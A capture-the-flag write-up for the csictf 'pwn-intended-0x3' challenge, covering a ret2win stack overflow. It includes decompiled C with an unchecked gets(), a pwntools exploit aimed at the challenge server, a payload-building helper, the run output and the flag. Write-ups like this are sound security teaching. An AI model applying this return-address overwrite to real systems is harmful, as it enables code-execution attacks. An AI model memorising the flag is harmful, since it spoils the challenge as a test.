CSICTF-Writeups/Pwn/pwn-intended-0x3/README.md

pwn-intended-0x3

The main idea for finding the flag is to overflow the stack buffer with padding and then overwrite the saved return address with the address of the flag function.

Step-1:

After I downloaded pwn-intended-0x3, I reversed it with IDA and got this decompiled source code:

main() function:

```c
undefined8 main(void)
{
  char local_28 [32];   /* 32-byte stack buffer, 40 bytes below the saved return address */

  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Welcome to csictf! Time to teleport again.");
  gets(local_28);       /* no length check: anything longer than 32 bytes overwrites the stack */
  return 0;
}
```

flag() function (never called by main, so we have to return into it ourselves):

```c
void flag(void)
{
  puts("Well, that was quick. Here\'s your flag:");
  system("cat flag.txt");
                    /* WARNING: Subroutine does not return */
  exit(0);
}
```

Step-2:

I just had to write the address of the flag function after 32+8 bytes: 32 bytes fill the buffer, the next 8 overwrite the saved rbp, and the 8 bytes after that replace the saved return address that main() returns to.

So I used the debugger to get the address of flag (the binary is not position independent, so the address is fixed):

```sh
echo 'info functions' | gdb ./pwn-intended-0x3 | grep flag
```

I got this output:

```text
0x00000000004011ce  flag
```

Step-3:

I wrote a very common rev_exploit.py with pwntools to pwn the remote machine:

```python
import pwn

# Address of flag() from `info functions` in gdb (no PIE, so it never changes)
FLAG_ADDR = 0x4011ce

r = pwn.remote('chall.csivit.com', 30013)

# 32 bytes of buffer + 8 bytes of saved rbp, then the return address
# overwritten with flag(). p64() packs it little-endian: ce 11 40 00 00 00 00 00
payload = b"A" * 40 + pwn.p64(FLAG_ADDR)

r.sendline(payload)
r.interactive()
```
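Here is a stand-alone way to build the same payload, as an added example that is not part of the original writeup and needs no pwntools (standard library only). `parse_info_functions`, `build_payload` and `gets_safe` are names chosen for this example, and the gdb output it parses is a constructed sample, not captured from the real binary. It goes slightly beyond the page: it also checks for the one byte that would truncate a gets() payload.

```python
import struct

# Stack layout recovered from the decompiled main(): a 32-byte buffer
# (local_28), then the 8-byte saved rbp, then the saved return address.
BUF_SIZE = 32
SAVED_RBP_SIZE = 8
RET_OFFSET = BUF_SIZE + SAVED_RBP_SIZE  # 40 bytes of padding

# flag() address as printed by gdb's `info functions`. The binary is not
# position independent, so this address is the same on every run.
FLAG_ADDR = 0x4011CE

# Constructed sample of `info functions` output (not captured from gdb);
# only the `flag` line matches what the writeup saw.
SAMPLE_INFO_FUNCTIONS = """\
Non-debugging symbols:
0x0000000000401000  _init
0x00000000004011ce  flag
0x0000000000401206  main
"""


def parse_info_functions(output: str, name: str) -> int:
    """Return the address of symbol `name` from gdb `info functions` text."""
    for line in output.splitlines():
        parts = line.split()
        if len(parts) == 2 and parts[1] == name and parts[0].startswith("0x"):
            return int(parts[0], 16)
    raise ValueError(f"symbol {name!r} not found")


def build_payload(ret_addr: int, offset: int = RET_OFFSET, filler: bytes = b"A") -> bytes:
    """Padding up to the saved return address, then the target address.

    x86-64 is little-endian, so 0x4011ce becomes the bytes ce 11 40 00 00 00 00 00;
    struct.pack("<Q", ...) does the same job as pwntools' p64().
    """
    return filler * offset + struct.pack("<Q", ret_addr)


def gets_safe(payload: bytes) -> bool:
    """gets() stops at the first newline (0x0a) but happily copies NUL bytes,
    so a newline is the only byte that would cut this payload short."""
    return b"\n" not in payload


if __name__ == "__main__":
    addr = parse_info_functions(SAMPLE_INFO_FUNCTIONS, "flag")
    payload = build_payload(addr)
    if not gets_safe(payload):
        raise SystemExit("payload contains a newline; gets() would truncate it")
    # Feed the file to a local copy of the binary: ./pwn-intended-0x3 < payload.bin
    with open("payload.bin", "wb") as f:
        f.write(payload + b"\n")
```

One caveat when testing locally (general knowledge, not something the writeup hit): on systems where system() is entered with a stack that is not 16-byte aligned, returning straight to flag() can crash on a movaps instruction inside libc. The usual workaround is to return to flag()+1 (skipping the 1-byte push rbp) or through a ret gadget. The remote service in this writeup accepted the direct address.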

Step-4:

When I finally ran `python3 rev_exploit.py`, I got this output:

```text
[+] Opening connection to chall.csivit.com on port 30013: Done
[*] Switching to interactive mode
Welcome to csictf! Time to teleport again.
Well, that was quick. Here's your flag:
You've reached your destination, here's a flag!
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive 
$
[*] Interrupted
```

Voila! I got the flag there.

Step-5:

Finally the flag becomes: csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}